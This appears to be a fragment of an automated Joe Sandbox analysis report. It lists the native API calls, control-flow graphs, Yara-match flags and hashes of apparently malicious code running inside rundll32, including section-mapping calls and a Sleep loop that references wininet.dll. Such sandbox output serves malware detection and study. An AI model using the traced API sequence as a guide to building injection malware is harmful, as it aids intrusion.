                                control_flow_graph 268 47a9bb2-47a9bfe call 47a9102 271 47a9c0c-47a9c9a call 47ab942 * 2 NtCreateSection 268->271 272 47a9c00 268->272 278 47a9d5a-47a9d68 271->278 279 47a9ca0-47a9d0a call 47ab942 NtMapViewOfSection 271->279 273 47a9c02-47a9c0a 272->273 273->271 273->273 282 47a9d0c-47a9d4c 279->282 283 47a9d52 279->283 285 47a9d69-47a9d6b 282->285 286 47a9d4e-47a9d4f 282->286 283->278 287 47a9d88-47a9ddc call 47acd62 NtClose 285->287 288 47a9d6d-47a9d72 285->288 286->283 290 47a9d74-47a9d86 call 47a9172 288->290 290->287
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4541190154.00000000047A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_47a0000_rundll32.jbxd
                                Similarity
                                • API ID: Section$CreateView
                                • String ID: @$@
                                • API String ID: 1585966358-149943524
                                • Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                • Instruction ID: 40bf25d83fdedcd094785e94bac38228231ddad0bfbcc4e9dec74f8f3bb90b25
                                • Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                • Instruction Fuzzy Hash: 5B515FB0618B088FD758DF18D8956AABBE0FB98314F50062EE58AD3651DF35E481CB86

                                Control-flow Graph

                                APIs
                                • NtQueryInformationProcess.NTDLL ref: 047AA19F
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4541190154.00000000047A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_47a0000_rundll32.jbxd
                                Similarity
                                • API ID: InformationProcessQuery
                                • String ID: 0
                                • API String ID: 1778838933-4108050209
                                • Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                • Instruction ID: efcf7b39e82820cb7974eb117eafc7d50fa34c33ba19b01bc7a117da69d55a10
                                • Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                • Instruction Fuzzy Hash: BF512D70918A8C8FDBA9EF68C8946EEBBF4FB98305F40462ED44AD7250DF309645CB41

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 550 7aa350-7aa3a1 call 7aaf50 NtCreateFile
                                APIs
                                • NtCreateFile.NTDLL(00000060,00000000,.z`,007A4BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,007A4BA7,007A002E,00000000,00000060,00000000,00000000), ref: 007AA39D
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_790000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateFile
                                • String ID: .z`
                                • API String ID: 823142352-1441809116
                                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                • Instruction ID: c86a4f4d5dd8c7f42968bd1417f596e22554834d81f75021aa395c77c8d010aa
                                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                • Instruction Fuzzy Hash: 7FF0BDB2200208AFCB48CF88DC85EEB77ADAF8C754F158248BA1D97241C630E811CBA4

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 553 7aa400-7aa449 call 7aaf50 NtReadFile
                                APIs
                                • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!Jz,FFFFFFFF,?,bMz,?,00000000), ref: 007AA445
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_790000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileRead
                                • String ID: !Jz
                                • API String ID: 2738559852-2089339496
                                • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                • Instruction ID: bcb72558084f104865f34752b2df2d8f35401a1e6b1751e7360bfbf95b0445cb
                                • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                • Instruction Fuzzy Hash: 9FF0B7B2200208AFCB18DF89DC85EEB77ADEF8C754F158248BE1D97241D630E911CBA0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 556 7aa34a-7aa34b 557 7aa36e-7aa3a1 NtCreateFile 556->557 558 7aa34d-7aa34e 556->558 558->557
                                APIs
                                • NtCreateFile.NTDLL(00000060,00000000,.z`,007A4BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,007A4BA7,007A002E,00000000,00000060,00000000,00000000), ref: 007AA39D
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_790000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateFile
                                • String ID: .z`
                                • API String ID: 823142352-1441809116
                                • Opcode ID: 72938932b16b44c2ae16e7d63586980b453333b2797915cc557ce602824b82a9
                                • Instruction ID: bd226d8a37f50c80c975fd7dd02ba9a3c78e5806568d7d405684c32a4ace3dc7
                                • Opcode Fuzzy Hash: 72938932b16b44c2ae16e7d63586980b453333b2797915cc557ce602824b82a9
                                • Instruction Fuzzy Hash: 90F0A5B2204508BB8F08CFA8D984DEB77EEAF8C310725864CFA5DD7204C634E8128B61

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 565 7aa480-7aa4a9 call 7aaf50 NtClose
                                APIs
                                • NtClose.NTDLL(@Mz,?,?,007A4D40,00000000,FFFFFFFF), ref: 007AA4A5
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_790000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close
                                • String ID: @Mz
                                • API String ID: 3535843008-2061303224
                                • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                • Instruction ID: 827cf6b8331806efb52c67e0ee5e14ca8c2c1c28842f921b21adb1c8a83ea2ec
                                • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                • Instruction Fuzzy Hash: 14D01275200214BFD714EB98CC45E97775CEF44750F154555BA1C5B242C530F60087E0
                                APIs
                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00792D11,00002000,00003000,00000004), ref: 007AA569
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_790000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateMemoryVirtual
                                • String ID:
                                • API String ID: 2167126740-0
                                • Opcode ID: 28c3e7504914c46bb522233e716bf922b4f23b1eefe060d1897c2a1881c36bda
                                • Instruction ID: 8ac5894670eedc912e48272df47d326dd5f78cc308e627c617871c589a6e4047
                                • Opcode Fuzzy Hash: 28c3e7504914c46bb522233e716bf922b4f23b1eefe060d1897c2a1881c36bda
                                • Instruction Fuzzy Hash: 97F0FEB6200149AFCB14DF88DC40EE777A9AF88354F154149FA5D97241C630E911CBB4
                                APIs
                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00792D11,00002000,00003000,00000004), ref: 007AA569
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_790000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateMemoryVirtual
                                • String ID:
                                • API String ID: 2167126740-0
                                • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                • Instruction ID: fede6b463d88e37b09dc35bb28cbec18ec74d629bf151b98fda893d45d448c71
                                • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                • Instruction Fuzzy Hash: 70F015B2200208AFCB18DF89CC81EAB77ADAF88754F118248BE1C97241C630F910CBA0
                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                • Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 8a5fd20a1a007714168544a4e4773f40fd56988f07a118074fb45488aa2a519e
                                • Instruction ID: 0cb9bf16685556d5b3a567ea848ba112583a021b6b8dd51644eb8e3bd048fa89
                                • Opcode Fuzzy Hash: 8a5fd20a1a007714168544a4e4773f40fd56988f07a118074fb45488aa2a519e
                                • Instruction Fuzzy Hash: 9190023120150402F100B598590C686004D8BE4305F55D021A5426555EC665D9916571
                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                • Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: cf52fb897f2431167d101aa75b97e70c20c3dc5793f4f9ef5646a40607da3dab
                                • Instruction ID: 5e8751f1e1057efc32254bc2777ae8a0f3ef560158ab98852c38f0f8a8487f48
                                • Opcode Fuzzy Hash: cf52fb897f2431167d101aa75b97e70c20c3dc5793f4f9ef5646a40607da3dab
                                • Instruction Fuzzy Hash: A890023120158802F110B158890878A004D8BD4305F59C421A4826658D8695D9917561
                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                • Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: b51abde513119a4bd0350e79da3ff8c874d00d2a7c35d83990c46fff5ce89ce0
                                • Instruction ID: 479a0252a58eb9317a45b87a026e2e4c9004820ffac5ccef53450a4a17987dee
                                • Opcode Fuzzy Hash: b51abde513119a4bd0350e79da3ff8c874d00d2a7c35d83990c46fff5ce89ce0
                                • Instruction Fuzzy Hash: EC90023120150842F100B1584908B86004D8BE4305F55C026A0526654D8615D9517961
                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                • Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 061605d08525b44aeec7517a8d9f53cb6962f24220e6655e8da5c269468899a3
                                • Instruction ID: b65b4b2a0f8aa920f59a58e2c1156e071da8e7957643541b70237ee4f93e08df
                                • Opcode Fuzzy Hash: 061605d08525b44aeec7517a8d9f53cb6962f24220e6655e8da5c269468899a3
                                • Instruction Fuzzy Hash: 36900221242541527545F1584908547404E9BE4245795C022A1816950C8526E956DA61
                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                • Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 86eb022665994cadb3330e1da04334b563362155d87de9094303ad25ec3cbf1e
                                • Instruction ID: 9759d54e4f59ac8900c5555f54d0b217d757aa40b0c7a0212b3db58f22d59acc
                                • Opcode Fuzzy Hash: 86eb022665994cadb3330e1da04334b563362155d87de9094303ad25ec3cbf1e
                                • Instruction Fuzzy Hash: 6190023120150413F111B1584A08747004D8BD4245F95C422A0826558D9656DA52A561
                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                • Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 1c9313399d016d643f5b53c9c7520c510a6eb274bdb6810961dc7f6395f9a92c
                                • Instruction ID: 4857f8ac809b13efa5008e6b06592edfec1a6571dbbad0e1d856507c377f2cf2
                                • Opcode Fuzzy Hash: 1c9313399d016d643f5b53c9c7520c510a6eb274bdb6810961dc7f6395f9a92c
                                • Instruction Fuzzy Hash: F090022921350002F180B158590C64A004D8BD5206F95D425A0417558CC915D9695761
                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                • Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: c728dd289e10b2e24a8379c41b9ce4f5a9d26b19ffe6264fc2ce384a4cd21f00
                                • Instruction ID: b14d95184746a4d2503595ea74ccee2b72a7c9889c540f3c45412d6f7ef1169c
                                • Opcode Fuzzy Hash: c728dd289e10b2e24a8379c41b9ce4f5a9d26b19ffe6264fc2ce384a4cd21f00
                                • Instruction Fuzzy Hash: 7D90027120150402F140B1584908786004D8BD4305F55C021A5466554E8659DED56AA5
                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                • Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 3e34ab19dc40f4f1a3bab41e8d5813696d28d914f8a17ced5f12515099c9da82
                                • Instruction ID: 381c39328649ea6c4191b77e354604d232881e5e50858fd60c423b3125542dad
                                • Opcode Fuzzy Hash: 3e34ab19dc40f4f1a3bab41e8d5813696d28d914f8a17ced5f12515099c9da82
                                • Instruction Fuzzy Hash: 03900221211D0042F200B5684D18B47004D8BD4307F55C125A0556554CC915D9615961
                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                • Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 91a301f3b212255bfe5573565247441cb3218fa87eddefa857191a887657e0c6
                                • Instruction ID: 7d6baa1165175b2b256416f124d1f5241059334df36fec24be0e823f9b122295
                                • Opcode Fuzzy Hash: 91a301f3b212255bfe5573565247441cb3218fa87eddefa857191a887657e0c6
                                • Instruction Fuzzy Hash: 8E90026134150442F100B1584918B46004DCBE5305F55C025E1466554D8619DD526566
                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                • Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 50284f0872f6bd13bee4722ca0aa299785866a75a046f9a00bd71edd1b806893
                                • Instruction ID: 1f538fb53d99e6bfc149984a32c677f1ec99147071e55d2b291bc8d842517e50
                                • Opcode Fuzzy Hash: 50284f0872f6bd13bee4722ca0aa299785866a75a046f9a00bd71edd1b806893
                                • Instruction Fuzzy Hash: 9A900225211500032105F5580B08547008E8BD9355355C031F1417550CD621D9615561
                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                • Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 9b89e3ea8dbd86de19591ae681b0d7c079f88556100f1e8f1f2fda84540be2cd
                                • Instruction ID: e6c1de983b77e588e8a83505fbee7a13d24c35259fc5403711ad0876354ef356
                                • Opcode Fuzzy Hash: 9b89e3ea8dbd86de19591ae681b0d7c079f88556100f1e8f1f2fda84540be2cd
                                • Instruction Fuzzy Hash: 8290023120150802F180B158490868A004D8BD5305F95C025A0427654DCA15DB597BE1
                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                • Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: e96ade282109d3a0a82f36ac539843ec2fb92193bb4e708834ae5996d302ba73
                                • Instruction ID: ba820372892dee031f416e462c972786685941f02baafc475902e22fbbc8b3b5
                                • Opcode Fuzzy Hash: e96ade282109d3a0a82f36ac539843ec2fb92193bb4e708834ae5996d302ba73
                                • Instruction Fuzzy Hash: 4690023120554842F140B1584908A86005D8BD4309F55C021A0466694D9625DE55BAA1
                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                • Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 725f3b23217847736b79de9cede0209e026d7a131580f1ef1778711e1242ac7b
                                • Instruction ID: 577fa960d360b8712a8df5558a4934d4ca89d3017182315b8439d38e1040ee7b
                                • Opcode Fuzzy Hash: 725f3b23217847736b79de9cede0209e026d7a131580f1ef1778711e1242ac7b
                                • Instruction Fuzzy Hash: 63900261202500036105B1584918656404E8BE4205B55C031E1416590DC525D9916565
                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                • Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: c14c476d65d765e4f462c297d0e1a9fb9615cb33e2c9cbf363bcfb283af774fe
                                • Instruction ID: 19ff4527b287843ea93f9bdeabb9917b2cc7432da4f82f3e517b153c049c4628
                                • Opcode Fuzzy Hash: c14c476d65d765e4f462c297d0e1a9fb9615cb33e2c9cbf363bcfb283af774fe
                                • Instruction Fuzzy Hash: E090023160560402F100B1584A18746104D8BD4205F65C421A0826568D8795DA5169E2

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 405 7a9070-7a90b2 call 7abd30 408 7a90b8-7a9108 call 7abe00 call 79ace0 call 7a4e40 405->408 409 7a918c-7a9192 405->409 416 7a9110-7a9121 Sleep 408->416 417 7a9123-7a9129 416->417 418 7a9186-7a918a 416->418 419 7a912b-7a9151 call 7a8c90 417->419 420 7a9153-7a9174 call 7a8ea0 417->420 418->409 418->416 424 7a9179-7a917c 419->424 420->424 424->418
                                APIs
                                • Sleep.KERNELBASE(000007D0), ref: 007A9118
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_790000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep
                                • String ID: net.dll$wininet.dll
                                • API String ID: 3472027048-1269752229
                                • Opcode ID: 7ed88bf67dbf4bad71974df8e21c5d54c8f32e3d265ed98b999e141507852e89
                                • Instruction ID: a14148c04270efc79c96816bdc521f6950ee5d6695b000cd380676a13ca12c24
                                • Opcode Fuzzy Hash: 7ed88bf67dbf4bad71974df8e21c5d54c8f32e3d265ed98b999e141507852e89
                                • Instruction Fuzzy Hash: 6531A1B2900705FBC724DF64C889F67B7B8BB89B01F10851DF62A5B245DB34A660CBA5

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 425 7a9067-7a90b2 call 7abd30 430 7a90b8-7a9108 call 7abe00 call 79ace0 call 7a4e40 425->430 431 7a918c-7a9192 425->431 438 7a9110-7a9121 Sleep 430->438 439 7a9123-7a9129 438->439 440 7a9186-7a918a 438->440 441 7a912b-7a9151 call 7a8c90 439->441 442 7a9153-7a9174 call 7a8ea0 439->442 440->431 440->438 446 7a9179-7a917c 441->446 442->446 446->440
                                APIs
                                • Sleep.KERNELBASE(000007D0), ref: 007A9118
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_790000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep
                                • String ID: net.dll$wininet.dll
                                • API String ID: 3472027048-1269752229
                                • Opcode ID: 97e766ba82bd21325750f3801e752769b7edd76ebfd661f751cac1b712f3039f
                                • Instruction ID: e4df9036f9157f4be3eecf86da8ad8128ff97bee64a249c7e5447cb3274a9895
                                • Opcode Fuzzy Hash: 97e766ba82bd21325750f3801e752769b7edd76ebfd661f751cac1b712f3039f
                                • Instruction Fuzzy Hash: 4721E4B1940305FBC714DF64C889F67B7B4BB89700F10815DF6295B246D778A520CBA5

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 562 7aa660-7aa691 call 7aaf50 RtlFreeHeap
                                APIs
                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00793AF8), ref: 007AA68D
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_790000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: FreeHeap
                                • String ID: .z`
                                • API String ID: 3298025750-1441809116
                                • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                • Instruction ID: f255a0ec1638ce260ebe8d7744b26c2a2304657733017b692d34495965fa7ace
                                • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                • Instruction Fuzzy Hash: B4E012B1200208AFDB18EF99CC49EA777ACAF88750F018658BA1C5B242C630E910CAB0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 559 7aa620-7aa651 call 7aaf50 RtlAllocateHeap
                                APIs
                                • RtlAllocateHeap.NTDLL(&Ez,?,007A4C9F,007A4C9F,?,007A4526,?,?,?,?,?,00000000,00000000,?), ref: 007AA64D
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_790000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap
                                • String ID: &Ez
                                • API String ID: 1279760036-4267687970
                                • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                • Instruction ID: b1eeeaba7f2c89ec4879b9fc528f5a9ef8e775e838a5c4a4c9f99121826f8ac6
                                • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                • Instruction Fuzzy Hash: 14E012B1200208AFDB18EF99CC45EA777ACAF88654F118558BA1C5B242C630F910CBB0
                                APIs
